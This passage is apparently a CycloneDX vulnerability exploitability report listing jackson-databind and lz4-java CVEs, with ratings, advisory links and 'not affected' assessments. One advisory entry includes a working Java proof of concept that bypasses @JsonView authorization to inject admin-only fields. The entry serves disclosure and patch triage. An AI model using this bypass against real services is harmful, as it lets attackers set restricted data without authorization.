          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#d63084ae-4792-4030-b143-56af2f0b3a07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f5f90bd8-21b0-4253-bfa9-385081effac8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e957d906-c42e-4fb7-bfc8-c6ff62a11be3"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#b2ce0dc9-ee06-494d-ad4a-0c0663e6c724"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#ab3e6ae4-c670-4606-8cee-cbd23914cb70"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#b9c07a39-fd27-434d-8891-5111f0472387"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d186c746-922b-43dd-bd1f-d442c97b2304"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#a4a8ed8c-a7d6-41f4-a90f-b12e7b231ac3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e297498f-7f89-44c0-92ea-ac5ee12bd35d"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. MapperFeature.ACCEPT_CASE_INSENSITIVE_PROPERTIES is not enabled in the product, so the case-insensitive @JsonIgnoreProperties bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-59888",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.15.0 until 2.18.8, 2.21.4, and 3.1.4, Java Records using a PropertyNamingStrategy can bypass @JsonIgnore because POJOPropertiesCollector._removeUnwantedIgnorals() records an ignored component under its original implicit name before _renameUsing() applies the naming strategy, allowing the renamed JSON key to be assigned to the Record constructor parameter. This issue is fixed in versions 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59888"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59888"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/baa2cdf5ca2b2717fbb88d91955d69d8651df3e4"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c7c678360624da5bc7eed2152789fa522880db9d"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5974"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-3pjw-73gf-8qr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59888"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59888"
        }
      ],
      "published": "2026-07-14T17:17:15+00:00",
      "updated": "2026-07-15T20:18:23+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a01ea052-e695-444c-befa-01774aabc231/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#69bb2bc0-1cdc-41bb-94df-6c5233916d74"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#9fb00781-15ac-441a-8c36-f84d7e0f38e8"
        },
        {
          "ref": "urn:cdx:73af4a37-1312-4900-9e6e-f1a74c04e48b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9f7aa80a-0e89-401b-a1a6-8eda1e3895f0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#ea5574b5-ad91-4db6-8aa6-c7d7313a218d"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#b6ba5a9e-e1b3-46ec-9028-07c384592d7b"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#f6c512bc-73c5-4628-a0e8-b658b3d7af76"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ffbc1f98-e2f2-458f-9e4c-63aa02239775"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f7bfbfb0-9b0c-4b82-8cb9-6dbb084abb35"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fbb746a9-fd76-4193-abe3-302eac53ca1f"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#dd784541-adc8-40c0-b2fa-9bfeace52539"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#c47be594-1ee9-449a-bd4a-f32127d64866"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#d63084ae-4792-4030-b143-56af2f0b3a07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f5f90bd8-21b0-4253-bfa9-385081effac8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e957d906-c42e-4fb7-bfc8-c6ff62a11be3"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#b2ce0dc9-ee06-494d-ad4a-0c0663e6c724"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#ab3e6ae4-c670-4606-8cee-cbd23914cb70"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#b9c07a39-fd27-434d-8891-5111f0472387"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d186c746-922b-43dd-bd1f-d442c97b2304"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#a4a8ed8c-a7d6-41f4-a90f-b12e7b231ac3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e297498f-7f89-44c0-92ea-ac5ee12bd35d"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59889",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        863
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.18.0 until 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1, UnwrappedPropertyHandler.processUnwrapped() replays buffered JSON for a @JsonUnwrapped property and calls prop.deserializeAndSet() without a prop.visibleInView(ctxt.getActiveView()) guard, allowing a property annotated with both @JsonView and @JsonUnwrapped to be written from attacker JSON under a less-privileged active view. This issue is fixed in versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.21.5, 2.18.9, 2.22.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59889"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/d627a8a86fcb062429282f79f3f256f181ed2c7b"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/6060"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/6056"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5gvw-p9qm-jgwh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59889"
        }
      ],
      "published": "2026-07-14T21:17:06+00:00",
      "updated": "2026-07-16T16:19:15+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a01ea052-e695-444c-befa-01774aabc231/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#69bb2bc0-1cdc-41bb-94df-6c5233916d74"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#9fb00781-15ac-441a-8c36-f84d7e0f38e8"
        },
        {
          "ref": "urn:cdx:73af4a37-1312-4900-9e6e-f1a74c04e48b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9f7aa80a-0e89-401b-a1a6-8eda1e3895f0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#ea5574b5-ad91-4db6-8aa6-c7d7313a218d"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#b6ba5a9e-e1b3-46ec-9028-07c384592d7b"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#f6c512bc-73c5-4628-a0e8-b658b3d7af76"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ffbc1f98-e2f2-458f-9e4c-63aa02239775"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f7bfbfb0-9b0c-4b82-8cb9-6dbb084abb35"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fbb746a9-fd76-4193-abe3-302eac53ca1f"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#dd784541-adc8-40c0-b2fa-9bfeace52539"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#c47be594-1ee9-449a-bd4a-f32127d64866"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#d63084ae-4792-4030-b143-56af2f0b3a07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f5f90bd8-21b0-4253-bfa9-385081effac8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e957d906-c42e-4fb7-bfc8-c6ff62a11be3"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#b2ce0dc9-ee06-494d-ad4a-0c0663e6c724"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#ab3e6ae4-c670-4606-8cee-cbd23914cb70"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#b9c07a39-fd27-434d-8891-5111f0472387"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d186c746-922b-43dd-bd1f-d442c97b2304"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#a4a8ed8c-a7d6-41f4-a90f-b12e7b231ac3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e297498f-7f89-44c0-92ea-ac5ee12bd35d"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59949",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "yawkat LZ4 Java provides LZ4 compression for Java. Prior to 1.11.1, JNI-backed XXHash implementations fail to validate the byte array object and the off and len arguments in XXHashFactory.nativeInstance().hash32().hash(), XXHashFactory.nativeInstance().hash64().hash(), XXHashFactory.nativeInstance().newStreamingHash32().update(), and XXHashFactory.nativeInstance().newStreamingHash64().update(), allowing null arrays or oversized ranges to reach native code, read outside the Java array, and fatally terminate the JVM. This issue is fixed in version 1.11.1.",
      "recommendation": "Upgrade at.yawk.lz4:lz4-java to version 1.11.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59949"
        },
        {
          "url": "https://github.com/yawkat/lz4-java"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/commit/dbd86d04b8dd716e1c2bc626be54189997d910da"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/releases/tag/v1.11.1"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/security/advisories/GHSA-xx22-p4ch-683r"
        }
      ],
      "published": "2026-08-18T15:16:56+00:00",
      "updated": "2026-08-18T18:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:maven/at.yawk.lz4/lz4-java@1.10.2",
          "versions": [
            {
              "version": "1.10.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#c013a21b-fd88-4cd6-aaba-b16f6b3baece"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#b53e6f01-467d-43ab-a70c-131b39739e78"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:ed06d4a7-53d6-4489-a311-15154e41a002/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#edc4f074-b727-4059-b151-514fd423bca0"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#f153dba6-8684-4667-9045-6e412c06ad46"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#7a9a6c60-db68-4232-bf30-51874a0049fb"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#a150b6f8-c30b-4829-b0da-eeda479e695d"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f2253d3b-08c6-4ac0-b2e5-f328f429dde4"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#ff94bef5-d62a-488f-93d4-b84d463957fc"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#f8f19df5-6db7-4268-bb33-2efa6264eba8"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#c820dd1c-e5f8-41c6-b5a9-c221f2098201"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#ffc18c57-29d2-4698-8ab1-a9e01800c2be"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#ec42aa72-4409-45b5-9455-1da216dba533"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#f818e555-29e7-43dd-ad84-f67f6d0c7a42"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#55fc1b48-3c1b-4506-84b7-12eb3bcc0ec1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#dde97af0-3c75-493b-8f8d-b7e3f174df23"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Kafka's own bundled LZ4 codec, which every CP repo relies on transitively for record-batch compression, only ever calls the always-safe one-shot XXHash hash() API with non-null, internally-bounded buffers; the vulnerable streaming update() API is never called anywhere in the CP repo set."
      }
    },
    {
      "id": "GHSA-mhm7-754m-9p8w",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "description": "## Summary\n\nIn `BeanDeserializer.deserializeUsingPropertyBasedWithExternalTypeId`, the active-view (`@JsonView`) filter was applied only to the regular bean-property branch; the creator-property branch performed no `creatorProp.visibleInView(activeView)` check. A constructor parameter annotated with both `@JsonView(RestrictedView.class)` and `@JsonTypeInfo(use=Id.NAME,\n  include=As.EXTERNAL_PROPERTY)` is populated from attacker JSON even when a more restrictive view is active.\n\n  This is a patch gap. GHSA-5hh8 (CVE-2026-54517) and GHSA-rcqc (CVE-2026-54518) descriptions cover only the main property-based path and the unwrapped-creator path respectively; the external-type-id creator path was fixed on the 3.x line via #6004 (\"Extend #5969/#5971 fixes to ... external-type-id case in regular BeanDeserializer\", commit 7dc7a17, 2026-05-22) but\n  **the fix was never backported to 2.21 or 2.18**. Users on 2.21.4 and 2.18.8 who upgraded per the published advisories remain vulnerable to the same `@JsonView` bypass technique via a different code path.\n\n## Vulnerable Code Path\n\nFile: `com/fasterxml/jackson/databind/deser/BeanDeserializer.java`\nMethod: `deserializeUsingPropertyBasedWithExternalTypeId`\n\nOn 2.21.4 (and 2.18.8), the creator-property branch (around line 1125-1158) checks `creatorProp.isInjectionOnly()` and hands off to `ext.handlePropertyValue(...)` / `buffer.assignParameter(...)` without ever consulting `visibleInView(activeView)`:\n\n ```java\n  if (creatorProp != null) {\n      // [databind#1381]: if useInput=FALSE, skip deserialization from input\n      if (creatorProp.isInjectionOnly()) { ... }\n      // NO visibleInView(activeView) CHECK HERE\n      if (!ext.handlePropertyValue(p, ctxt, propName, null)) {\n          if (buffer.assignParameter(creatorProp, ...)) { ... }\n      }\n      continue;\n  }\n```\n\nOn 3.1.4, the same branch contains the additional guard (commit 7dc7a17):\n\n ```java\n   if (creatorProp != null) {\n      // [databind#5971]: must honor active view here too\n      if ((activeView != null) && !creatorProp.visibleInView(activeView)) {\n          p.skipChildren();\n          continue;\n      }\n      ...\n  }\n```\n\nThe 2.21 and 2.18 backport PRs (#6005 and #6003) only backported the main-path fixes from #5969/#5971; the external-type-id fix from #6004 was not backported. The maintainer closed #6005\n  with \"got changes merged forward, looks like it's all covered now\", but the forward-merge did not include the ExtTypeId creator branch.\n\n  Proof of Concept\n\n  Compiles and runs against jackson-databind 2.21.4:\n \n```java\n  import com.fasterxml.jackson.annotation.*;\n  import com.fasterxml.jackson.databind.ObjectMapper;\n\n  public class JsonViewExternalTypeIdBypass {\n      public static class PublicView {}\n      public static class AdminView extends PublicView {}\n\n      public static abstract class Asset { public String name; }\n      public static class PublicAsset extends Asset {}\n      public static class AdminAsset extends Asset { public String secret; }\n\n      public static class Container {\n          @JsonTypeInfo(use = JsonTypeInfo.Id.NAME,\n                  include = JsonTypeInfo.As.EXTERNAL_PROPERTY,\n                  property = \"kind\")\n          @JsonSubTypes({\n              @JsonSubTypes.Type(value = PublicAsset.class, name = \"pub\"),\n              @JsonSubTypes.Type(value = AdminAsset.class,  name = \"admin\")\n          })\n          @JsonView(AdminView.class)\n          public Asset asset;\n\n          public String label;\n\n          @JsonCreator\n          public Container(\n                  @JsonProperty(\"label\") String label,\n                  @JsonProperty(\"asset\") @JsonView(AdminView.class) Asset asset) {\n              this.label = label;\n              this.asset = asset;\n          }\n      }\n\n      public static class Wrapper {\n          @JsonView(PublicView.class)\n          public Container data;\n      }\n\n      public static void main(String[] args) throws Exception {\n          // Admin-only \"asset\" should be blocked when reading with PublicView\n          String json = \"{\\\"data\\\":{\\\"label\\\":\\\"hello\\\",\\\"kind\\\":\\\"admin\\\",\"\n                      + \"\\\"asset\\\":{\\\"name\\\":\\\"foo\\\",\\\"secret\\\":\\\"LEAKED\\\"}}}\";\n\n          ObjectMapper om = new ObjectMapper();\n          Wrapper r = om.readerWithView(PublicView.class)\n                  .forType(Wrapper.class)\n                  .readValue(json);\n\n          System.out.println(r.data);\n          // Actual on 2.21.4:   Container{label='hello', asset=AdminAsset{name='foo', secret='LEAKED'}}\n          // Expected (secure):  Container{label='hello', asset=null}\n          if (r.data.asset != null && r.data.asset instanceof AdminAsset) {\n              System.out.println(\"[!!] BYPASS CONFIRMED \u2014 admin-only asset populated under PublicView\");\n          }\n      }\n  }\n```\n\nA control case that removes include = As.EXTERNAL_PROPERTY (forcing the normal property-based path) correctly returns asset = null, confirming the bypass is specific to the ExternalTypeId\n  code path and not a misconfiguration.\n\n### Impact\n\n  View-restricted (e.g. admin-only) creator properties can be populated from untrusted input where @JsonView is used as a write-side authorization boundary. Typical victims are Spring Boot\n  REST controllers that use @JsonView(PublicView.class) on the request body to whitelist user-settable fields \u2014 an attacker can inject the restricted creator parameter (including choosing\n  the polymorphic subtype via the sibling kind/type-id property) by combining it with a polymorphic @JsonTypeInfo(EXTERNAL_PROPERTY) annotation on the same field.\n\n- CWE-863 (Incorrect Authorization)\n- Same impact class as CVE-2026-54517 / CVE-2026-54518\n- No RCE, no DoS \u2014 this is an access-control / mass-assignment bypass\n\n### Trigger Conditions\n\nDeveloper code must combine (no opt-in user configuration required):\n\n1. Property-based @JsonCreator on the outer type\n2. A creator parameter annotated with @JsonView(RestrictedView.class)\n3. The same parameter annotated with @JsonTypeInfo(use=Id.NAME, include=As.EXTERNAL_PROPERTY, property=\"...\")",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.9, 2.21.5",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-mhm7-754m-9p8w"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c628b357ed143d8492756d5c1458cfb9fbeb29ed"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/dea7eb466e98cc226c4ac65587581fb49926820c"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-mhm7-754m-9p8w"
        }
      ],
      "published": "2026-07-21T19:40:12+00:00",
      "updated": "2026-07-21T19:40:12+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
